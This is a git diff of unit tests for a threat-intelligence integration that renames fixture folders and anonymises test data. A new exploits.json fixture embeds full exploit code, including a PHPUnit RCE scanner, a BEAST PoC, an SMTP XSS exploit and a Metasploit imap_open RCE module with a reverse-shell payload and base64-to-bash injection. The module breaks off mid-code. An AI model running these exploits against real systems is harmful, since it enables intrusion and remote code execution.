@@ -871,7 +877,7 @@ def test_modify_alert_notes_command(requests_mock, mocker): """ alert_id = "123" notes = "some notes" - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -914,7 +920,7 @@ def test_submit_threat_command(requests_mock, mocker): alert_type = "email" violation = "phishing" entity_id = "123" - submit_response = load_json("TestData/alerts/submit_threat.json") + submit_response = load_json("test_data/alerts/submit_threat.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post("/2.0/threat_submit/", json=submit_response) client = build_zf_client() @@ -955,8 +961,8 @@ def test_compromised_domain_command(requests_mock, mocker): And with the correct output prefix """ domain = "abc.xyz" - c2_domains_response = load_json("TestData/cti/c2-domains.json") - phishing_response = load_json("TestData/cti/phishing.json") + c2_domains_response = load_json("test_data/cti/c2-domains.json") + phishing_response = load_json("test_data/cti/phishing.json") requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) requests_mock.get("/cti/c2-domains/", json=c2_domains_response) 
@@ -992,12 +998,12 @@ def test_compromised_email_command(requests_mock, mocker): And with the correct output prefix """ email = "abc@test.xyz" - email_response = load_json("TestData/cti/email-addresses.json") + email_response = load_json("test_data/cti/email-addresses.json") credentials_response = load_json( - "TestData/cti/compromised-credentials.json", + "test_data/cti/compromised-credentials.json", ) botnet_credentials_response = load_json( - "TestData/cti/botnet-compromised-credentials.json", + "test_data/cti/botnet-compromised-credentials.json", ) requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) @@ -1055,8 +1061,8 @@ def test_malicious_ip_command(requests_mock, mocker): And with the correct output prefix """ ip = "127.0.0.1" - botnet_response = load_json("TestData/cti/botnet.json") - phishing_response = load_json("TestData/cti/phishing.json") + botnet_response = load_json("test_data/cti/botnet.json") + phishing_response = load_json("test_data/cti/phishing.json") requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) requests_mock.get("/cti/botnet/", json=botnet_response) @@ -1094,7 +1100,7 @@ def test_malicious_hash_command(requests_mock, mocker): """ hash = "e89b43d57a67a3f4d705028cfbd7b6fb" hash_types = ["md5", "sha1", "sha256", "sha512"] - malware_response = load_json("TestData/cti/malware.json") + malware_response = load_json("test_data/cti/malware.json") requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) requests_mock.get("/cti/malware/", json=malware_response) 
@@ -1130,7 +1136,7 @@ def test_search_exploits_command(requests_mock, mocker): And with the correct output prefix """ since = "2023-06-27T00:00:00Z" - exploits_response = load_json("TestData/cti/exploits.json") + exploits_response = load_json("test_data/cti/exploits.json") requests_mock.post("/auth/token/verify/") requests_mock.post("/auth/token/", json={"access": "token"}) requests_mock.get("/cti/exploits/", json=exploits_response) diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/change_tags.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/change_tags.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/change_tags.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/change_tags.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/closed_alert.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/closed_alert.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/closed_alert.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/closed_alert.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/list_10_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/list_10_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/list_10_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/list_10_records.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/list_no_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/list_no_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/list_no_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/list_no_records.json 
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/opened_alert.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/opened_alert.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/opened_alert.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/opened_alert.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/submit_threat.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/submit_threat.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/alerts/submit_threat.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/alerts/submit_threat.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet-compromised-credentials.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet-compromised-credentials.json similarity index 90% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet-compromised-credentials.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet-compromised-credentials.json index 1c18a38941b5..1945f4968c0b 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet-compromised-credentials.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet-compromised-credentials.json @@ -3,7 +3,7 @@ "results": [ { "domain": "stark.com", - "email": "natasha@stark.com", + "email": "email-address", "username": "natasha", "password": "7bb288255cb89d277fed03f3e2c6e724", "breach_name": "Raid Forums/XSS/Exploit: Stark Data Breach (7,409,054 Records)", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet.json similarity index 95% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet.json index 83a9928f91f7..be922d154363 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/botnet.json 
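Review bot: The anonymisation in the botnet-compromised-credentials.json hunk is partial and its placeholder differs from the sibling fixtures: `email` becomes `email-address` here but `some_email_address` in compromised-credentials.json and email-addresses.json, and botnet.json uses `ip_address` while c2-domains.json uses `some_ip_address`. In the same record the `username` and the `password` value `7bb288255cb89d277fed03f3e2c6e724` are kept, and in every botnet.json hunk `c2_ip_address` still carries `184.105.192.2` while only `ip_address` was replaced, so the fixtures still mix real-looking indicators and credential material with placeholders. One placeholder scheme across all five files — preferably values reserved for documentation, e.g. `user@example.com` and `192.0.2.1`, which keep the fields well-formed if the code under test ever validates them — and replacing the remaining password and C2 address values would finish the job. The botnet.json, c2-domains.json, compromised-credentials.json and email-addresses.json hunks show the same pattern.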
+++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/botnet.json @@ -2,7 +2,7 @@ "next": null, "results": [ { - "ip_address": "99.83.33.209", + "ip_address": "ip_address", "listed_at": "2023-02-09T23:44:09Z", "bot_name": "andromeda", "c2_ip_address": "184.105.192.2", @@ -28,7 +28,7 @@ ] }, { - "ip_address": "99.83.33.209", + "ip_address": "ip_address", "listed_at": "2023-02-09T23:44:09Z", "bot_name": "andromeda", "c2_ip_address": "184.105.192.2", @@ -54,7 +54,7 @@ ] }, { - "ip_address": "99.83.33.209", + "ip_address": "ip_address", "listed_at": "2023-02-09T23:44:09Z", "bot_name": "andromeda", "c2_ip_address": "184.105.192.2", @@ -80,7 +80,7 @@ ] }, { - "ip_address": "99.83.33.209", + "ip_address": "ip_address", "listed_at": "2023-02-27T11:12:35.375167Z", "bot_name": "andromeda", "c2_ip_address": "184.105.192.2", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/c2-domains.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/c2-domains.json similarity index 94% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/c2-domains.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/c2-domains.json index c304a382ecde..29c0518f6f0b 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/c2-domains.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/c2-domains.json @@ -15,7 +15,7 @@ "family:mal/generic-s" ], "ip_addresses": [ - "64.190.63.111" + "some_ip_address" ], "updated_at": "2023-06-14T10:56:24Z", "created_at": "2023-06-14T11:10:48.373715Z" @@ -34,7 +34,7 @@ "family:mal/generic-s" ], "ip_addresses": [ - "64.190.63.111" + "some_ip_address" ], "updated_at": "2023-06-14T23:15:05Z", "created_at": "2023-06-27T13:03:40.949689Z" 
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/compromised-credentials.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/compromised-credentials.json similarity index 80% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/compromised-credentials.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/compromised-credentials.json index 741726cc57f6..8a3f7efd3b17 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/compromised-credentials.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/compromised-credentials.json @@ -3,8 +3,8 @@ "results": [ { "domain": "stark.industries", - "email": "tony@stark.industries", - "username": "tony@stark.industries", + "email": "some_email_address", + "username": "some_email_address", "password": null, "breach_name": "BreachForums/Amunet: American Academy of Psychiatry and the Law Data Breach (3,001 Records)", "breach_id": "123", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/email-addresses.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/email-addresses.json similarity index 89% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/email-addresses.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/email-addresses.json index 25890a725132..7138fa1b9edc 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/email-addresses.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/email-addresses.json @@ -3,7 +3,7 @@ "results": [ { "created_at": "2023-06-27T12:31:05Z", - "email": "james@stark.com", + "email": "some_email_address", "domain": "stark.com", "tags": [ "family:agenttesla", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/exploits.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/exploits.json new file mode 100644 index 000000000000..5b349a7fac8b --- /dev/null +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/exploits.json 
@@ -0,0 +1,87 @@ +{ + "next": "https://api.zerofox.com/cti/exploits/?cursor=c2E9MTYyNzU2ODM2ODAwMCZzYT0zMQ%3D%3D&since=2023-06-27T00%3A00%3A00Z", + "results": [ + { + "created_at": "2021-07-26T09:40:37Z", + "cve": "CVE-2017-9841", + "urls": [ + "https://github.com/ludy-dev/PHPUnit_eval-stdin_RCE/blob/master/PHPUnit_eval-stdin_RCE.py" + ], + "exploit": "import re\nimport requests\nimport sys\nimport os\nimport base64\n\ndef exploit(dst_addr):\n\tlist = {\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/Util/PHP/eval-stdin.php\"}\n\t\n\tprint(dst_addr)\n\tfor i in list:\n\t\t\n\t\tURL=\"http://\"+dst_addr+i\n\t\tprint(URL)\n\t\tdata = \"\"\n\t\tres = requests.post(URL, data=data, verify=False)\n\t\tresponse = res.text\n\t\t\n \t\tp = re.compile('c0eb89e1d7f2982390f96603e66f2b6b') # md5(Apri1) = c0eb89e1d7f2982390f96603e66f2b6b\n\t\tm = p.match(response)\n\t\tprint(\"Status Code : %d\"% res.status_code)\n\t\tif m:\n\t\t\t\tprint(\"Vuln Found\")\n\t\telse:\n\t\t\t\tprint(\"Not Found\")\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) == 2:\n\t\t sys.argv.append('80')\n\telif len(sys.argv) < 3:\n\t\t\tprint ('Usage: python %s ' % os.path.basename(sys.argv[0]))\n\t\t\tsys.exit()\t\n\taddress =(sys.argv[1], sys.argv[2])\n\tdst_addr=\":\".join(address)\n\texploit(dst_addr)" + }, + { + "created_at": "2021-07-26T10:50:22Z", + "cve": "CVE-2011-3389", + "urls": [ + "https://github.com/mpgn/BEAST-PoC" + ], + "exploit": "#!/usr/bin/env python\n# -*- coding: utf-8 
-*-\n\n'''\n BEAST attack - PoC\n Implementation of the cryptographic path behind the attack\n Author: mpgn \n'''\n\nimport random\nimport binascii\nimport sys\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\"\"\"\n AES-CBC\n function encrypt, decrypt, pad, unpad\n You can fix the IV in the function encrypt() because TLS 1.0 fix the IV\n for the second, third... request (to gain time)\n\"\"\"\n\ndef pad(s):\n return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)\n\ndef unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n# we admit the handshake produce a secret key for the session\n# of course we do not have any HMAC etc .. but there are not usefull in this attack\ndef encrypt( msg, iv_p=0):\n raw = pad(msg)\n if iv_p == 0:\n iv = Random.new().read( AES.block_size )\n else:\n iv = iv_p\n global key\n key = Random.new().read( AES.block_size )\n cipher = AES.new('V38lKILOJmtpQMHp', AES.MODE_CBC, iv )\n return cipher.encrypt( raw )\n\n\"\"\"\n The PoC of BEAST attack -\n Implementation of the cryptographic path behind the attack\n - the attacker can retrieve the request send be the client \n - but also make the client send requests with the plain text of his choice\n\"\"\"\n\ndef xor_strings(xs, ys, zs):\n return \"\".join(chr(ord(x) ^ ord(y) ^ ord(z)) for x, y, z in zip(xs, ys, zs))\n\ndef xor_block(vector_init, previous_cipher,p_guess):\n xored = xor_strings(vector_init, previous_cipher, p_guess)\n return xored\n\ndef split_len(seq, length):\n return [seq[i:i+length] for i in range(0, len(seq), length)]\n\n# the PoC start here, two method, one with two request\n# the other with two request\ndef run_two_request(find_me):\n print \"Start decrypting the request block 0 --> block 0\\n\"\n \n secret = []\n\n # the part of the request the atacker know, can be null\n i_know = \"flag: \"\n\n # padding is the length we need to add to i_know to create a length of 15 bytes\n padding = 16 - len(i_know) - 1\n i_know = \"a\"*padding + i_know\n\n # add_byte will be 
decrement every byte deciphered\n add_byte = 16\n length_block = 16\n t = 0\n\n # retrieve all the request\n while(t < (len(find_me)-len(\"flag: \"))):\n for i in range(0,256):\n \n # good pad\n if (add_byte+padding) < 0:\n s = find_me[-1*(add_byte+padding):]\n else:\n s = find_me\n\n # the client send the encrypted request with socket and TLS1.0\n # you intercept the request and now you have: enc\n enc = encrypt(\"a\"*(add_byte+padding) + s)\n\n # get the value of the request ciphered\n original = split_len(binascii.hexlify(enc), 32)\n\n # GUESS XOR VI XOR C_I_1 build by the attacker\n vector_init = str(enc[-length_block:])\n previous_cipher = str(enc[0:length_block])\n p_guess = i_know + chr(i)\n \n xored = xor_block( vector_init, previous_cipher, p_guess)\n\n # with some javascript injection, you force the client to send\n # request of your choice, the TLS1.0 fix the IV to the last block of the previous request\n # with a MiTM you intercept the result and get\n enc = encrypt(xored, vector_init)\n\n result = split_len(binascii.hexlify(enc), 32)\n\n sys.stdout.write(\"\\r%s -> %s \" % (original[1], result[0]))\n sys.stdout.flush()\n\n # if the result request contains the same cipher block from the original request -> OK\n if result[0] == original[1]:\n print \" Find char \" + chr(i)\n i_know = p_guess[1:]\n add_byte = add_byte - 1\n secret.append(chr(i))\n t = t + 1\n break\n elif i == 255:\n print \"Unable to find the char...\"\n return secret\n return secret\n\n# the PoC start here \ndef run_three_request(find_me):\n print \"Start decrypting the request using block 0 --> block 1\\n\"\n\n secret = []\n\n # the part of the request the atacker know, can be null\n i_know = \"flag: \"\n\n # padding is the length we need to add to i_know to create a length of 15 bytes\n padding = 16 - len(i_know) - 1\n i_know = \"a\"*padding + i_know\n length_block = 16\n t = 0\n\n # retrieve all the request\n while(t < (len(find_me)-len(\"flag: \"))):\n for i in range(0,256):\n # 
good pad\n if padding < 0:\n s = find_me[-1*(padding):]\n else:\n s = find_me\n \n # the first request is send\n first_r = encrypt(\"a\"*(padding) + s)\n # the second request is send\n enc = encrypt(\"a\"*(padding) + s, first_r[-length_block:])\n\n # get the value of the request ciphered\n original = split_len(binascii.hexlify(enc), 32)\n\n # GUESS XOR VI XOR C_I_1 build by the attacker\n vector_init = str(enc[-length_block:])\n previous_cipher = str(first_r[-length_block:])\n p_guess = i_know + chr(i)\n\n xored = xor_block( vector_init, previous_cipher, p_guess)\n\n # with some javascript injection, you force the client to send the\n # request of your choice, the TLS1.0 fix the IV to the last block of the previous request\n # with a MiTM you intercept the result and get\n enc = encrypt(xored, vector_init)\n\n result = split_len(binascii.hexlify(enc), 32)\n\n sys.stdout.write(\"\\r%s -> %s \" % (original[0], result[0]))\n sys.stdout.flush()\n\n # if the result request contains the same cipher block from the original request -> OK\n if result[0] == original[0]:\n print \" Find char \" + chr(i)\n i_know = p_guess[1:]\n padding = padding -1\n secret.append(chr(i))\n t = t + 1\n break\n elif i == 255:\n print \"Unable to find the char...\"\n return secret\n return secret\n\n\n# the attacker don't know the flag\nsecret = run_three_request(\"flag: WIN{TLS_1.0_Not_SO_Good_With_Socket}\")\n# or\n# secret = run_two_request(\"flag: WIN{TLS_1.0_Not_SO_Good_With_Socket}\")\n\nfound = ''.join(secret)\nprint \"\\n\" + found" + }, + { + "created_at": "2021-07-26T12:19:18Z", + "cve": "CVE-2005-2857", + "urls": [ + "some_host/exploits/1193" + ], + "exploit": "#!usr/bin/perl\n#\n# FREE SMTP Spam Filter Exploit\n# ------------------------------------\n# Infam0us Gr0up - Securiti Research\n#\n# Info: infamous.2hell.com\n# Vendor URL: some_host/\n# \n\nuse IO::Socket;\nuse Socket;\n\nprint(\"\\n FREE SMTP Spam Filter Exploit\\n\");\nprint(\" 
---------------------------------\\n\\n\");\n\n# Changes to own feed \n$helo = \"mail.test\"; # HELO\n$mfrom = \"[support@vuln.test]\"; # MAIL FROM\n$rcpto = \"[root@localhost]\"; # RCPT TO\n$date = \"11 Feb 2099 12:07:10\"; # Date\n$from = \"Micro SEX's\"; # From mailer\n$subject = \"Check the new version.. ®®®\\n\".\n\"[b]VICKY VETTE[/b][i]is HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!![/i]\".\n\"[br][a href=http://127.0.0.1 onMouseOver=alert(document.cookie);]Click Here[/a]\"; # subject spammmer\n\nif($#ARGV < 0 | $#ARGV > 1) { \ndie \"usage: perl $0 [IP/host] \\nExam: perl $0 127.0.0.1 \\n\" };\n\n$adr = $ARGV[0];\n$prt = \"25\";\n\n# Don't changes this one\n$act1 = \"\\x48\\x45\\x4c\\x4f $helo\";\n$act2 = \"\\x4d\\x41\\x49\\x4c \\x46\\x52\\x4f\\x4d\\x3a$mfrom\";\n$act3 = \"\\x52\\x43\\x50\\x54 f\\x54\\x4f\\x3a$rcpto\";\n$act4 = \"\\x44\\x41\\x54\\x41\";\n$act5 = \"\\x44\\x61\\x74\\x65\\x3a $date\";\n\n$sub = \n\"\\x46\\x72\\x6f\\x6d\\x3a $from\".\n\"\\x53\\x75\\x62\\x6a\\x65\\x63\\x74\\x3a $subject\\x2e\".\n\"\\x51\\x55\\x49\\x54\";\n\nprint \"[+] Connect to $adr..\\n\";\n$remote = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>$adr,\nPeerPort=>$prt, Reuse=>1) or die \"[-] Error: can't connect to $adr:$prt\\n\";\nprint \"[+] Connected!\\n\";\n$remote->autoflush(1);\nprint \"[*] Send HELO..\";\nprint $remote \"$act1\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send MAIL FROM..\";\nprint $remote \"$act2\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send RCPT TO..\";\nprint $remote \"$act3\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send DATA..\";\nprint $remote \"$act4\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send DATE..\";\nprint $remote \"$act5\" or die \"\\n[-] Error: can't send xploit 
code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send Sub Mail..\";\nprint $remote \"$sub\" or die \"\\n[-] Error: can't send xploit code\\n\";\nprint \"[OK]\\n\";\nprint \"[*] QUIT..\\n\";\nprint \"[+] MAIL SPAMWNED!\\n\\n\";\nclose $remote;\nprint \"press any key to exit..\\n\";\n$bla= [STDIN];\n\n# milw0rm.com [2005-09-02]" + }, + { + "created_at": "2021-07-26T12:35:48Z", + "cve": "CVE-2018-19518", + "urls": [ + "https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/linux/http/php_imap_open_rce.rb" + ], + "exploit": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'php imap_open Remote Code Execution',\n 'Description' => %q{\n The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an\n IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand\n option can be passed from imap_open to execute arbitrary commands.\n While many custom applications may use imap_open, this exploit works against the following applications:\n e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.\n Prestashop exploitation requires the admin URI, and administrator credentials.\n suiteCRM/e107 require administrator credentials. 
Fixed in php 5.6.39.\n },\n 'Author' =>\n [\n 'Anton Lopanitsyn', # Vulnerability discovery and PoC\n 'Twoster', # Vulnerability discovery and PoC\n 'h00die', # Metasploit Module\n 'Paolo Serracino', # Horde IMP EDB\n 'Pietro Minniti', # Horde IMP EDB\n 'Damiano Proietti' # Horde IMP EDB\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],\n [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ],\n [ 'EDB', '45865'],\n # This claims all versions of Horde IMP are vuln, but only H3 (~2012) and possibly older are vuln.\n [ 'EDB', '46136'],\n [ 'URL', 'some_host/bug.php?id=76428'],\n [ 'CVE', '2018-19518'],\n [ 'CVE', '2018-1000859']\n ],\n 'Privileged' => false,\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'prestashop', {} ],\n [ 'suitecrm', {}],\n [ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron\n [ 'Horde IMP H3', {}],\n [ 'custom', {'WfsDelay' => 300}]\n ],\n 'PrependFork' => true,\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat',\n 'WfsDelay' => 120\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2018-10-23'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base directory path\", '/admin2769gx8k3']),\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", ''])\n ])\n end\n\n def check\n if target.name =~ /prestashop/\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({'uri' => uri})\n if res && (res.code == 301 || res.code == 302)\n return CheckCode: :Detected\n end\n elsif target.name =~ /suitecrm/\n #login page GET /index.php?action=Login&module=Users\n vprint_status('Loading login page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'action' => 'Login',\n 'module' => 'Users'\n }\n )\n unless res\n print_error('Error loading 
site. Check options.')\n return\n end\n\n if res.code = 200\n return CheckCode: :Detected\n end\n elsif target.name =~ /Horde IMP H3/\n res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'imp', 'test.php')})\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n major, minor = res.body.scan(/PHP Major Version: (?5\\.[1-6]{1})<\/li>\\s+
  • PHP Minor Version: (?[\\d]?\\d)/).flatten\n phpversion = \"#{major}.#{minor}\"\n if res.code == 200 && res.body =~ /PHP Mail Server Support Test/ && phpversion != '.'\n if Rex::Version.new(phpversion) < Rex::Version.new('5.6.39')\n vprint_good(\"PHP Version #{phpversion} is vulnerable\")\n return CheckCode: :Appears\n else\n vprint_bad(\"PHP Version #{phpversion} is NOT vulnerable, patched in 5.6.39.\")\n end\n end\n end\n CheckCode::Safe\n end\n\n def command(spaces='$IFS$()')\n #payload is base64 encoded, and stuffed into the SSH option.\n enc_payload = Rex::Text.encode_base64(payload.encoded)\n command = \"-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`\"\n #final payload can not contain spaces, however $IFS$() will return the space we require\n command.gsub!(' ', spaces)\n end\n\n def exploit\n if target.name =~ /prestashop/\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({'uri' => uri})\n if res && res.code != 301\n print_error('Admin redirect not found, check URI. 
Should be something similar to /admin2769gx8k3')\n return\n end\n\n #There are a bunch of redirects that happen, so we automate going through them to get to the login page.\n while res.code == 301 || res.code == 302\n cookie = res.get_cookies\n uri = res.headers['Location']\n vprint_status(\"Redirected to #{uri}\")\n res = send_request_cgi({'uri' => uri})\n end\n\n #Tokens are generated for each URL or sub-component, we need valid ones!\n /.*token=(?\\w{32})/ =~ uri\n /id=\"redirect\" value=\"(?.*)\"\/>/ =~ res.body\n cookie = res.get_cookies\n\n unless token && redirect\n print_error('Unable to find token and redirect URL, check options.')\n return\n end\n\n vprint_status(\"Token: #{token} and Login Redirect: #{redirect}\")\n print_status(\"Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'ajax' => 1,\n 'token' => '',\n 'controller' => 'AdminLogin',\n 'submitLogin' => '1',\n 'passwd' => datastore['PASSWORD'],\n 'email' => datastore['USERNAME'],\n 'redirect' => redirect\n },\n 'vars_get' => {\n 'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated\n }\n )\n if res && res.body.include?('Invalid password')\n print_error('Invalid Login')\n return\n end\n vprint_status(\"Login JSON Response: #{res.body}\")\n uri = JSON.parse(res.body)['redirect']\n cookie = res.get_cookies\n print_good('Login Success, loading admin dashboard to pull tokens')\n res = send_request_cgi({'uri' => uri, 'cookie' => cookie})\n\n /AdminCustomerThreads&token=(?\\w{32})/ =~ res.body\n vprint_status(\"Customer Threads Token: #{token}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'AdminCustomerThreads',\n 'token' => token\n }\n })\n\n /form method=\"post\" 
action=\"index\\.php\\?controller=AdminCustomerThreads&token=(?\\w{32})/ =~ res.body\n print_good(\"Sending Payload with Final Token: #{token}\")\n data = Rex::MIME::Message.new\n data.add_part('1', nil, nil, 'form-data; name=\"PS_CUSTOMER_SERVICE_FILE_UPLOAD\"')\n data.add_part(\"Dear Customer,\\n\\nRegards,\\nCustomer service\", nil, nil, 'form-data; name=\"PS_CUSTOMER_SERVICE_SIGNATURE_1\"')\n data.add_part(\"x #{command}}\", nil, nil, 'form-data; name=\"PS_SAV_IMAP_URL\"')\n data.add_part('143', nil, nil, 'form-data; name=\"PS_SAV_IMAP_PORT\"')\n data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name=\"PS_SAV_IMAP_USER\"')\n data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name=\"PS_SAV_IMAP_PWD\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_DELETE_MSG\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_CREATE_THREADS\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_POP3\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NORSH\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_SSL\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_VALIDATE-CERT\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NOVALIDATE-CERT\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_TLS\"')\n data.add_part('0', nil, nil, 